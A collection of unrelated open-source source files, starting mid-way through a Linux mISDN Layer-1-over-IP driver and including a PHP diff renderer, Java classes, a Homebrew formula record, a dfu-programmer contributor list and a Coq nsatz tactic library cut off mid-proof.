dch->hw; switch (cq->op) { case MISDN_CTRL_GETOP: cq->op = MISDN_CTRL_SETPEER | MISDN_CTRL_UNSETPEER | MISDN_CTRL_GETPEER; break; case MISDN_CTRL_SETPEER: hc->remoteip = (u32)cq->p1; hc->remoteport = cq->p2 & 0xffff; hc->localport = cq->p2 >> 16; if (!hc->remoteport) hc->remoteport = hc->localport; if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: got new ip address from user " "space.\n", __func__); l1oip_socket_open(hc); break; case MISDN_CTRL_UNSETPEER: if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: removing ip address.\n", __func__); hc->remoteip = 0; l1oip_socket_open(hc); break; case MISDN_CTRL_GETPEER: if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: getting ip address.\n", __func__); cq->p1 = hc->remoteip; cq->p2 = hc->remoteport | (hc->localport << 16); break; default: printk(KERN_WARNING "%s: unknown Op %x\n", __func__, cq->op); ret = -EINVAL; break; } return ret; } static int open_dchannel(struct l1oip *hc, struct dchannel *dch, struct channel_req *rq) { if (debug & DEBUG_HW_OPEN) printk(KERN_DEBUG "%s: dev(%d) open from %p\n", __func__, dch->dev.id, __builtin_return_address(0)); if (rq->protocol == ISDN_P_NONE) return -EINVAL; if ((dch->dev.D.protocol != ISDN_P_NONE) && (dch->dev.D.protocol != rq->protocol)) { if (debug & DEBUG_HW_OPEN) printk(KERN_WARNING "%s: change protocol %x to %x\n", __func__, dch->dev.D.protocol, rq->protocol); } if (dch->dev.D.protocol != rq->protocol) dch->dev.D.protocol = rq->protocol; if (test_bit(FLG_ACTIVE, &dch->Flags)) { _queue_data(&dch->dev.D, PH_ACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_KERNEL); } rq->ch = &dch->dev.D; if (!try_module_get(THIS_MODULE)) printk(KERN_WARNING "%s:cannot get module\n", __func__); return 0; } static int open_bchannel(struct l1oip *hc, struct dchannel *dch, struct channel_req *rq) { struct bchannel *bch; int ch; if (!test_channelmap(rq->adr.channel, dch->dev.channelmap)) return -EINVAL; if (rq->protocol == ISDN_P_NONE) return -EINVAL; ch = rq->adr.channel; /* BRI: 1=B1 2=B2 PRI: 1..15,17.. */ bch = hc->chan[ch].bch; if (!bch) { printk(KERN_ERR "%s:internal error ch %d has no bch\n", __func__, ch); return -EINVAL; } if (test_and_set_bit(FLG_OPEN, &bch->Flags)) return -EBUSY; /* b-channel can be only open once */ bch->ch.protocol = rq->protocol; rq->ch = &bch->ch; if (!try_module_get(THIS_MODULE)) printk(KERN_WARNING "%s:cannot get module\n", __func__); return 0; } static int l1oip_dctrl(struct mISDNchannel *ch, u_int cmd, void *arg) { struct mISDNdevice *dev = container_of(ch, struct mISDNdevice, D); struct dchannel *dch = container_of(dev, struct dchannel, dev); struct l1oip *hc = dch->hw; struct channel_req *rq; int err = 0; if (dch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: cmd:%x %p\n", __func__, cmd, arg); switch (cmd) { case OPEN_CHANNEL: rq = arg; switch (rq->protocol) { case ISDN_P_TE_S0: case ISDN_P_NT_S0: if (hc->pri) { err = -EINVAL; break; } err = open_dchannel(hc, dch, rq); break; case ISDN_P_TE_E1: case ISDN_P_NT_E1: if (!hc->pri) { err = -EINVAL; break; } err = open_dchannel(hc, dch, rq); break; default: err = open_bchannel(hc, dch, rq); } break; case CLOSE_CHANNEL: if (debug & DEBUG_HW_OPEN) printk(KERN_DEBUG "%s: dev(%d) close from %p\n", __func__, dch->dev.id, __builtin_return_address(0)); module_put(THIS_MODULE); break; case CONTROL_CHANNEL: err = channel_dctrl(dch, arg); break; default: if (dch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: unknown command %x\n", __func__, cmd); err = -EINVAL; } return err; } static int handle_bmsg(struct mISDNchannel *ch, struct sk_buff *skb) { struct bchannel *bch = container_of(ch, struct bchannel, ch); struct l1oip *hc = bch->hw; int ret = -EINVAL; struct mISDNhead *hh = mISDN_HEAD_P(skb); int l, ll; unsigned char *p; switch (hh->prim) { case PH_DATA_REQ: if (skb->len <= 0) { printk(KERN_WARNING "%s: skb too small\n", __func__); break; } if (skb->len > MAX_DFRAME_LEN_L1 || skb->len > L1OIP_MAX_LEN) { printk(KERN_WARNING "%s: skb too large\n", __func__); break; } /* check for AIS / ulaw-silence */ l = skb->len; if (!memchr_inv(skb->data, 0xff, l)) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: got AIS, not sending, " "but counting\n", __func__); hc->chan[bch->slot].tx_counter += l; skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; } /* check for silence */ l = skb->len; if (!memchr_inv(skb->data, 0x2a, l)) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: got silence, not sending" ", but counting\n", __func__); hc->chan[bch->slot].tx_counter += l; skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; } /* send frame */ p = skb->data; l = skb->len; while (l) { /* * This is technically bounded by L1OIP_MAX_PERFRAME but * MAX_DFRAME_LEN_L1 < L1OIP_MAX_PERFRAME */ ll = (l < MAX_DFRAME_LEN_L1) ? l : MAX_DFRAME_LEN_L1; l1oip_socket_send(hc, hc->codec, bch->slot, 0, hc->chan[bch->slot].tx_counter, p, ll); hc->chan[bch->slot].tx_counter += ll; p += ll; l -= ll; } skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; case PH_ACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_ACTIVATE channel %d (1..%d)\n" , __func__, bch->slot, hc->b_num + 1); hc->chan[bch->slot].codecstate = 0; test_and_set_bit(FLG_ACTIVE, &bch->Flags); skb_trim(skb, 0); queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); return 0; case PH_DEACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_DEACTIVATE channel %d " "(1..%d)\n", __func__, bch->slot, hc->b_num + 1); test_and_clear_bit(FLG_ACTIVE, &bch->Flags); skb_trim(skb, 0); queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; } if (!ret) dev_kfree_skb(skb); return ret; } static int channel_bctrl(struct bchannel *bch, struct mISDN_ctrl_req *cq) { int ret = 0; struct dsp_features *features = (struct dsp_features *)(*((u_long *)&cq->p1)); switch (cq->op) { case MISDN_CTRL_GETOP: cq->op = MISDN_CTRL_HW_FEATURES_OP; break; case MISDN_CTRL_HW_FEATURES: /* fill features structure */ if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: HW_FEATURE request\n", __func__); /* create confirm */ features->unclocked = 1; features->unordered = 1; break; default: printk(KERN_WARNING "%s: unknown Op %x\n", __func__, cq->op); ret = -EINVAL; break; } return ret; } static int l1oip_bctrl(struct mISDNchannel *ch, u_int cmd, void *arg) { struct bchannel *bch = container_of(ch, struct bchannel, ch); int err = -EINVAL; if (bch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: cmd:%x %p\n", __func__, cmd, arg); switch (cmd) { case CLOSE_CHANNEL: test_and_clear_bit(FLG_OPEN, &bch->Flags); test_and_clear_bit(FLG_ACTIVE, &bch->Flags); ch->protocol = ISDN_P_NONE; ch->peer = NULL; module_put(THIS_MODULE); err = 0; break; case CONTROL_CHANNEL: err = channel_bctrl(bch, arg); break; default: printk(KERN_WARNING "%s: unknown prim(%x)\n", __func__, cmd); } return err; } /* * cleanup module and stack */ static void release_card(struct l1oip *hc) { int ch; if (timer_pending(&hc->keep_tl)) del_timer(&hc->keep_tl); if (timer_pending(&hc->timeout_tl)) del_timer(&hc->timeout_tl); cancel_work_sync(&hc->workq); if (hc->socket_thread) l1oip_socket_close(hc); if (hc->registered && hc->chan[hc->d_idx].dch) mISDN_unregister_device(&hc->chan[hc->d_idx].dch->dev); for (ch = 0; ch < 128; ch++) { if (hc->chan[ch].dch) { mISDN_freedchannel(hc->chan[ch].dch); kfree(hc->chan[ch].dch); } if (hc->chan[ch].bch) { mISDN_freebchannel(hc->chan[ch].bch); kfree(hc->chan[ch].bch); #ifdef REORDER_DEBUG if (hc->chan[ch].disorder_skb) dev_kfree_skb(hc->chan[ch].disorder_skb); #endif } } spin_lock(&l1oip_lock); list_del(&hc->list); spin_unlock(&l1oip_lock); kfree(hc); } static void l1oip_cleanup(void) { struct l1oip *hc, *next; list_for_each_entry_safe(hc, next, &l1oip_ilist, list) release_card(hc); l1oip_4bit_free(); } /* * module and stack init */ static int init_card(struct l1oip *hc, int pri, int bundle) { struct dchannel *dch; struct bchannel *bch; int ret; int i, ch; spin_lock_init(&hc->socket_lock); hc->idx = l1oip_cnt; hc->pri = pri; hc->d_idx = pri ? 16 : 3; hc->b_num = pri ? 30 : 2; hc->bundle = bundle; if (hc->pri) sprintf(hc->name, "l1oip-e1.%d", l1oip_cnt + 1); else sprintf(hc->name, "l1oip-s0.%d", l1oip_cnt + 1); switch (codec[l1oip_cnt]) { case 0: /* as is */ case 1: /* alaw */ case 2: /* ulaw */ case 3: /* 4bit */ break; default: printk(KERN_ERR "Codec(%d) not supported.\n", codec[l1oip_cnt]); return -EINVAL; } hc->codec = codec[l1oip_cnt]; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using codec %d\n", __func__, hc->codec); if (id[l1oip_cnt] == 0) { printk(KERN_WARNING "Warning: No 'id' value given or " "0, this is highly unsecure. Please use 32 " "bit random number 0x...\n"); } hc->id = id[l1oip_cnt]; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using id 0x%x\n", __func__, hc->id); hc->ondemand = ondemand[l1oip_cnt]; if (hc->ondemand && !hc->id) { printk(KERN_ERR "%s: ondemand option only allowed in " "conjunction with non 0 ID\n", __func__); return -EINVAL; } if (limit[l1oip_cnt]) hc->b_num = limit[l1oip_cnt]; if (!pri && hc->b_num > 2) { printk(KERN_ERR "Maximum limit for BRI interface is 2 " "channels.\n"); return -EINVAL; } if (pri && hc->b_num > 126) { printk(KERN_ERR "Maximum limit for PRI interface is 126 " "channels.\n"); return -EINVAL; } if (pri && hc->b_num > 30) { printk(KERN_WARNING "Maximum limit for BRI interface is 30 " "channels.\n"); printk(KERN_WARNING "Your selection of %d channels must be " "supported by application.\n", hc->limit); } hc->remoteip = ip[l1oip_cnt << 2] << 24 | ip[(l1oip_cnt << 2) + 1] << 16 | ip[(l1oip_cnt << 2) + 2] << 8 | ip[(l1oip_cnt << 2) + 3]; hc->localport = port[l1oip_cnt]?:(L1OIP_DEFAULTPORT + l1oip_cnt); if (remoteport[l1oip_cnt]) hc->remoteport = remoteport[l1oip_cnt]; else hc->remoteport = hc->localport; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using local port %d remote ip " "%d.%d.%d.%d port %d ondemand %d\n", __func__, hc->localport, hc->remoteip >> 24, (hc->remoteip >> 16) & 0xff, (hc->remoteip >> 8) & 0xff, hc->remoteip & 0xff, hc->remoteport, hc->ondemand); dch = kzalloc(sizeof(struct dchannel), GFP_KERNEL); if (!dch) return -ENOMEM; dch->debug = debug; mISDN_initdchannel(dch, MAX_DFRAME_LEN_L1, NULL); dch->hw = hc; if (pri) dch->dev.Dprotocols = (1 << ISDN_P_TE_E1) | (1 << ISDN_P_NT_E1); else dch->dev.Dprotocols = (1 << ISDN_P_TE_S0) | (1 << ISDN_P_NT_S0); dch->dev.Bprotocols = (1 << (ISDN_P_B_RAW & ISDN_P_B_MASK)) | (1 << (ISDN_P_B_HDLC & ISDN_P_B_MASK)); dch->dev.D.send = handle_dmsg; dch->dev.D.ctrl = l1oip_dctrl; dch->dev.nrbchan = hc->b_num; dch->slot = hc->d_idx; hc->chan[hc->d_idx].dch = dch; i = 1; for (ch = 0; ch < dch->dev.nrbchan; ch++) { if (ch == 15) i++; bch = kzalloc(sizeof(struct bchannel), GFP_KERNEL); if (!bch) { printk(KERN_ERR "%s: no memory for bchannel\n", __func__); return -ENOMEM; } bch->nr = i + ch; bch->slot = i + ch; bch->debug = debug; mISDN_initbchannel(bch, MAX_DATA_MEM, 0); bch->hw = hc; bch->ch.send = handle_bmsg; bch->ch.ctrl = l1oip_bctrl; bch->ch.nr = i + ch; list_add(&bch->ch.list, &dch->dev.bchannels); hc->chan[i + ch].bch = bch; set_channelmap(bch->nr, dch->dev.channelmap); } /* TODO: create a parent device for this driver */ ret = mISDN_register_device(&dch->dev, NULL, hc->name); if (ret) return ret; hc->registered = 1; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: Setting up network card(%d)\n", __func__, l1oip_cnt + 1); ret = l1oip_socket_open(hc); if (ret) return ret; timer_setup(&hc->keep_tl, l1oip_keepalive, 0); hc->keep_tl.expires = jiffies + 2 * HZ; /* two seconds first time */ add_timer(&hc->keep_tl); timer_setup(&hc->timeout_tl, l1oip_timeout, 0); hc->timeout_on = 0; /* state that we have timer off */ return 0; } static int __init l1oip_init(void) { int pri, bundle; struct l1oip *hc; int ret; printk(KERN_INFO "mISDN: Layer-1-over-IP driver Rev. %s\n", l1oip_revision); INIT_LIST_HEAD(&l1oip_ilist); spin_lock_init(&l1oip_lock); if (l1oip_4bit_alloc(ulaw)) return -ENOMEM; l1oip_cnt = 0; while (l1oip_cnt < MAX_CARDS && type[l1oip_cnt]) { switch (type[l1oip_cnt] & 0xff) { case 1: pri = 0; bundle = 0; break; case 2: pri = 1; bundle = 0; break; case 3: pri = 0; bundle = 1; break; case 4: pri = 1; bundle = 1; break; default: printk(KERN_ERR "Card type(%d) not supported.\n", type[l1oip_cnt] & 0xff); l1oip_cleanup(); return -EINVAL; } if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: interface %d is %s with %s.\n", __func__, l1oip_cnt, pri ? "PRI" : "BRI", bundle ? "bundled IP packet for all B-channels" : "separate IP packets for every B-channel"); hc = kzalloc(sizeof(struct l1oip), GFP_ATOMIC); if (!hc) { printk(KERN_ERR "No kmem for L1-over-IP driver.\n"); l1oip_cleanup(); return -ENOMEM; } INIT_WORK(&hc->workq, (void *)l1oip_send_bh); spin_lock(&l1oip_lock); list_add_tail(&hc->list, &l1oip_ilist); spin_unlock(&l1oip_lock); ret = init_card(hc, pri, bundle); if (ret) { l1oip_cleanup(); return ret; } l1oip_cnt++; } printk(KERN_INFO "%d virtual devices registered\n", l1oip_cnt); return 0; } module_init(l1oip_init); module_exit(l1oip_cleanup);
{ "pile_set_name": "Github" }
Title: janitza_umg_freq: fixed crash when no frequency measurements were reported by the device Level: 1 Component: checks Compatible: compat Version: 1.2.7i3 Date: 1443103718 Class: fix
{ "pile_set_name": "Github" }
<?php /** * Inline HTML diff generator for PHP DiffLib. * * PHP version 5 * * Copyright (c) 2009 Chris Boulton <[email protected]> * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * - Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * - Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * - Neither the name of the Chris Boulton nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * * @package DiffLib * @author Chris Boulton <[email protected]> * @copyright (c) 2009 Chris Boulton * @license New BSD License http://www.opensource.org/licenses/bsd-license.php * @version 1.1 * @link http://github.com/chrisboulton/php-diff */ require_once dirname(__FILE__).'/Array.php'; class Diff_Renderer_Html_Inline extends Diff_Renderer_Html_Array { /** * Render a and return diff with changes between the two sequences * displayed inline (under each other) * * @return string The generated inline diff. */ public function render() { $changes = parent::render(); $html = ''; if(empty($changes)) { return $html; } $html .= '<table class="Differences DifferencesInline">'; $html .= '<thead>'; $html .= '<tr>'; $html .= '<th>Old</th>'; $html .= '<th>New</th>'; $html .= '<th>Differences</th>'; $html .= '</tr>'; $html .= '</thead>'; foreach($changes as $i => $blocks) { // If this is a separate block, we're condensing code so output ..., // indicating a significant portion of the code has been collapsed as // it is the same if($i > 0) { $html .= '<tbody class="Skipped">'; $html .= '<th>&hellip;</th>'; $html .= '<th>&hellip;</th>'; $html .= '<td>&nbsp;</td>'; $html .= '</tbody>'; } foreach($blocks as $change) { $html .= '<tbody class="Change'.ucfirst($change['tag']).'">'; // Equal changes should be shown on both sides of the diff if($change['tag'] == 'equal') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<td class="Left">'.$line.'</td>'; $html .= '</tr>'; } } // Added lines only on the right side else if($change['tag'] == 'insert') { foreach($change['changed']['lines'] as $no => $line) { $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>&nbsp;</th>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<td class="Right"><ins>'.$line.'</ins>&nbsp;</td>'; $html .= '</tr>'; } } // Show deleted lines only on the left side else if($change['tag'] == 'delete') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Left"><del>'.$line.'</del>&nbsp;</td>'; $html .= '</tr>'; } } // Show modified lines on both sides else if($change['tag'] == 'replace') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Left"><span>'.$line.'</span></td>'; $html .= '</tr>'; } foreach($change['changed']['lines'] as $no => $line) { $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Right"><span>'.$line.'</span></td>'; $html .= '</tr>'; } } $html .= '</tbody>'; } } $html .= '</table>'; return $html; } }
{ "pile_set_name": "Github" }
# # Copyright 2011-2020 Branimir Karadzic. All rights reserved. # License: https://github.com/bkaradzic/bgfx#license-bsd-2-clause # BGFX_DIR=../.. RUNTIME_DIR=$(BGFX_DIR)/examples/runtime BUILD_DIR=../../.build include $(BGFX_DIR)/scripts/shader.mk
{ "pile_set_name": "Github" }
/* * Sonatype Nexus (TM) Open Source Version * Copyright (c) 2008-present Sonatype, Inc. * All rights reserved. Includes the third-party code listed at http://links.sonatype.com/products/nexus/oss/attributions. * * This program and the accompanying materials are made available under the terms of the Eclipse Public License Version 1.0, * which accompanies this distribution and is available at http://www.eclipse.org/legal/epl-v10.html. * * Sonatype Nexus (TM) Professional Version is available from Sonatype, Inc. "Sonatype" and "Sonatype Nexus" are trademarks * of Sonatype, Inc. Apache Maven is a trademark of the Apache Software Foundation. M2eclipse is a trademark of the * Eclipse Foundation. All other trademarks are the property of their respective owners. */ package org.sonatype.nexus.security.authz; /** * Thrown when an {@link AuthorizationManager} could not be found. */ public class NoSuchAuthorizationManagerException extends Exception { private static final long serialVersionUID = -9130834235862218360L; public NoSuchAuthorizationManagerException(final String source) { super("Authorization-manager with source '" + source + "' could not be found"); } }
{ "pile_set_name": "Github" }
{ "name": "nodebrew", "full_name": "nodebrew", "oldname": null, "aliases": [ ], "versioned_formulae": [ ], "desc": "Node.js version manager", "license": "MIT", "homepage": "https://github.com/hokaccha/nodebrew", "versions": { "stable": "1.0.1", "head": "HEAD", "bottle": false }, "urls": { "stable": { "url": "https://github.com/hokaccha/nodebrew/archive/v1.0.1.tar.gz", "tag": null, "revision": null } }, "revision": 0, "version_scheme": 0, "bottle": { }, "keg_only": false, "bottle_disabled": true, "options": [ ], "build_dependencies": [ ], "dependencies": [ ], "recommended_dependencies": [ ], "optional_dependencies": [ ], "uses_from_macos": [ ], "requirements": [ ], "conflicts_with": [ ], "caveats": "You need to manually run setup_dirs to create directories required by nodebrew:\n $(brew --prefix)/opt/nodebrew/bin/nodebrew setup_dirs\n\nAdd path:\n export PATH=$HOME/.nodebrew/current/bin:$PATH\n\nTo use Homebrew's directories rather than ~/.nodebrew add to your profile:\n export NODEBREW_ROOT=$(brew --prefix)/var/nodebrew\n", "installed": [ ], "linked_keg": null, "pinned": false, "outdated": false, "deprecated": false, "disabled": false }
{ "pile_set_name": "Github" }
/* * (C) Copyright 2015-2016 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * Contributors: * [email protected] (夜色) */ package com.mpush.bootstrap; import com.mpush.tools.log.Logs; public class Main { /** * 源码启动请不要直接运行此方法,否则不能正确加载配置文件 * * @param args 启动参数 */ public static void main(String[] args) { Logs.init(); Logs.Console.info("launch mpush server..."); ServerLauncher launcher = new ServerLauncher(); launcher.init(); launcher.start(); addHook(launcher); } /** * 注意点 * 1.不要ShutdownHook Thread 里调用System.exit()方法,否则会造成死循环。 * 2.如果有非守护线程,只有所有的非守护线程都结束了才会执行hook * 3.Thread默认都是非守护线程,创建的时候要注意 * 4.注意线程抛出的异常,如果没有被捕获都会跑到Thread.dispatchUncaughtException * * @param launcher */ private static void addHook(ServerLauncher launcher) { Runtime.getRuntime().addShutdownHook( new Thread(() -> { try { launcher.stop(); } catch (Exception e) { Logs.Console.error("mpush server stop ex", e); } Logs.Console.info("jvm exit, all service stopped."); }, "mpush-shutdown-hook-thread") ); } }
{ "pile_set_name": "Github" }
Original Author: - Weston Schmidt <[email protected]> Contributors: - Reinhard Arlt - at89c5131 chip support - Anton Blad - at90usb162 and at90usb82 chip support - David Brownell - compiler flag improvements - command line argument processing improvements - debugging system improvements - significant man page improvements - support for the at90usb series AVR chips - the beginnings of the move over to using stdint.h - Nick Hibma - bug fixes - Markus Schneider - OS X porting issues - Geoffrey Wossum - added reset command - Sean D'Epagnier - eeprom bug fix - 4K bootloader support fix - Peter Gammie - at90usb647 PID fix - Zachary Clifford - completed AVR32 support - identified a number of off-by-one errors waiting to happen - identified that AVR32 "User Pages" aren't supported yet - patch to allow proper handling of the trampoline code - patch to allow flashing user flash space & STDIN - patch to enable support for windows using mingw32 - patch to enable setting/getting fuses for the AVR32 devices - Donald Davis - patch with new AVR devices & testing of support for the devices - Brad Schick - identified that the flash memory overlaps the bootloader memory - identified the off-by-one issue when the bootloader is in upper memory - Xavier Leprevost - patch to fix an error in the avr32 user flash dump command - Dave Fletcher - patch to enable atmega32u2 chips - Torsten Rottmann - patch to enable libusb 1.0 support - Mitko - patch to enable at32uc3b1512 and at32uc3b0512 chips - Darren Gibbs - identified dead/bad code around the bootloader overlap checking - Holger Steinhaus - patch to enable atmega8u2 - Martin Guy - patch to enable automotive AVR32 flashing without a timeout - Walker Inman - bugfix flash user page for avr32 - add stm32 devices - add progress bar - update algorithm for converting hex and sending program - simplify command structure - add ability to dump to hex file (and hex2bin / bin2hex) - svn -> git migration - update --help -h text - also a lot of formatting updates (sorry) - More info in README - Add autocomplete for Ubuntu - Simon Large - fix atmel_reset function - get rid of compiler warnings around fprintf statements - fix build system for selecting libusb-1.0 - atmega16u2 support - better support for Windows users - improve layout of help text - add security fuse support for AVR32 - fix memory bounds for xmega devices - Johannes Carlsson - patch to fix use of libusb in configure.ac - Grégory S. - identified too-late check for null pointer - Dmitry Nedospasov - support for xmega devices - Kees Bakker - support for atxmega256a3bu - David Nelson - support for at32uc3a4256s - support for using a specific usb bus/address - support for device serialisation - correction to --quiet output - Olivier Pisano - support for atxmega16c4 - Neels Hofmeyr - improvements to progress bar - John Szakmeister - Fix exit status of help-related options and improve start sequence - Alban Bedel - Fix infinite loop using rpl_malloc
{ "pile_set_name": "Github" }
(** This is a copy of the parts of the Coq stdlib implementing [nsatz], excluding the bit that adds support for [ℝ], which draws in axioms reported by coqchk. Once we move to Coq 8.13 as our minimum version, this should be dropped. *) (************************************************************************) (* * The Coq Proof Assistant / The Coq Development Team *) (* v * Copyright INRIA, CNRS and contributors *) (* <O___,, * (see version control and CREDITS file for authors & dates) *) (* \VV/ **************************************************************) (* // * This file is distributed under the terms of the *) (* * GNU Lesser General Public License Version 2.1 *) (* * (see LICENSE file for the text of the license) *) (************************************************************************) (* Tactic nsatz: proofs of polynomials equalities in an integral domain (commutative ring without zero divisor). Examples: see test-suite/success/Nsatz.v Reification is done using type classes, defined in Ncring_tac.v *) From Coq Require Import List. From Coq Require Import Setoid. From Coq Require Import BinPos. From Coq Require Import BinList. From Coq Require Import Znumtheory. From Coq Require Export Morphisms Setoid Bool. From Coq Require Export Algebra_syntax. From Coq Require Export Ncring. From Coq Require Export Ncring_initial. From Coq Require Export Ncring_tac. From Coq Require Export Integral_domain. From Coq Require Import ZArith. From Coq Require Import Lia. Declare ML Module "nsatz_plugin". Section nsatz1. Context {R:Type}`{Rid:Integral_domain R}. Lemma psos_r1b: forall x y:R, x - y == 0 -> x == y. intros x y H; setoid_replace x with ((x - y) + y); simpl; [setoid_rewrite H | idtac]; simpl. cring. cring. Qed. Lemma psos_r1: forall x y, x == y -> x - y == 0. intros x y H; simpl; setoid_rewrite H; simpl; cring. Qed. Lemma nsatzR_diff: forall x y:R, not (x == y) -> not (x - y == 0). intros. intro; apply H. simpl; setoid_replace x with ((x - y) + y). simpl. setoid_rewrite H0. simpl; cring. simpl. simpl; cring. Qed. (* adpatation du code de Benjamin aux setoides *) Export Ring_polynom. Export InitialRing. Definition PolZ := Pol Z. Definition PEZ := PExpr Z. Definition P0Z : PolZ := P0 (C:=Z) 0%Z. Definition PolZadd : PolZ -> PolZ -> PolZ := @Padd Z 0%Z Z.add Zeq_bool. Definition PolZmul : PolZ -> PolZ -> PolZ := @Pmul Z 0%Z 1%Z Z.add Z.mul Zeq_bool. Definition PolZeq := @Peq Z Zeq_bool. Definition norm := @norm_aux Z 0%Z 1%Z Z.add Z.mul Z.sub Z.opp Zeq_bool. Fixpoint mult_l (la : list PEZ) (lp: list PolZ) : PolZ := match la, lp with | a::la, p::lp => PolZadd (PolZmul (norm a) p) (mult_l la lp) | _, _ => P0Z end. Fixpoint compute_list (lla: list (list PEZ)) (lp:list PolZ) := match lla with | List.nil => lp | la::lla => compute_list lla ((mult_l la lp)::lp) end. Definition check (lpe:list PEZ) (qe:PEZ) (certif: list (list PEZ) * list PEZ) := let (lla, lq) := certif in let lp := List.map norm lpe in PolZeq (norm qe) (mult_l lq (compute_list lla lp)). (* Correction *) Definition PhiR : list R -> PolZ -> R := (Pphi ring0 add mul (InitialRing.gen_phiZ ring0 ring1 add mul opp)). Definition PEevalR : list R -> PEZ -> R := PEeval ring0 ring1 add mul sub opp (gen_phiZ ring0 ring1 add mul opp) N.to_nat pow. Lemma P0Z_correct : forall l, PhiR l P0Z = 0. Proof. trivial. Qed. Lemma Rext: ring_eq_ext add mul opp _==_. Proof. constructor; solve_proper. Qed. Lemma Rset : Setoid_Theory R _==_. apply ring_setoid. Qed. Definition Rtheory:ring_theory ring0 ring1 add mul sub opp _==_. apply mk_rt. apply ring_add_0_l. apply ring_add_comm. apply ring_add_assoc. apply ring_mul_1_l. apply cring_mul_comm. apply ring_mul_assoc. apply ring_distr_l. apply ring_sub_def. apply ring_opp_def. Defined. Lemma PolZadd_correct : forall P' P l, PhiR l (PolZadd P P') == ((PhiR l P) + (PhiR l P')). Proof. unfold PolZadd, PhiR. intros. simpl. refine (Padd_ok Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) _ _ _). Qed. Lemma PolZmul_correct : forall P P' l, PhiR l (PolZmul P P') == ((PhiR l P) * (PhiR l P')). Proof. unfold PolZmul, PhiR. intros. refine (Pmul_ok Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) _ _ _). Qed. Lemma R_power_theory : Ring_theory.power_theory ring1 mul _==_ N.to_nat pow. apply Ring_theory.mkpow_th. unfold pow. intros. rewrite Nnat.N2Nat.id. reflexivity. Qed. Lemma norm_correct : forall (l : list R) (pe : PEZ), PEevalR l pe == PhiR l (norm pe). Proof. intros;apply (norm_aux_spec Rset Rext (Rth_ARth Rset Rext Rtheory) (gen_phiZ_morph Rset Rext Rtheory) R_power_theory). Qed. Lemma PolZeq_correct : forall P P' l, PolZeq P P' = true -> PhiR l 